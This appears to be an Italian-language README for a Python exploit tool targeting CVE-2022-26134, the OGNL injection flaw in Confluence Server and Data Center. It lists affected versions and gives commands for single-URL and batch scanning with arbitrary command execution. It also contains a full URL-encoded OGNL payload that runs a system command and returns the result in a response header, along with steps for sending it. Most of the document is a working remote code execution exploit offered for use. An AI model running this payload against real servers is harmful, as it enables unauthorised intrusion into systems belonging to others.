
Exploit basato su Python per CVE-2022-26134, una vulnerabilità di iniezione OGNL in Confluence Server e Data Center. Supporta la verifica di singoli URL e la scansione batch con esecuzione arbitraria di comandi.
CVE-2022-26134 - Confluence OGNL injection vulnerability
Installare le librerie Python
pip install -r requirements.txt
Verifica della vulnerabilità
python3 CVE-2022-26134_check.py -u url -c whoami

Scansione batch
python3 CVE-2022-26134_check.py -f url.txt -c whoami

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1
payload:
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/
Accedere al servizio Confluence, catturare un pacchetto con codice di risposta 302, inviare un pacchetto contenente il payload. Nel pacchetto di risposta, il parametro X-Qualys-Response restituirà il nome utente corrente del server.

L'URI fornito dall'attaccante viene convertito in un namespace, che viene poi valutato come espressione OGNL (l'URL fornito dall'attaccante viene indirettamente trasformato in un'espressione OGNL e valutato).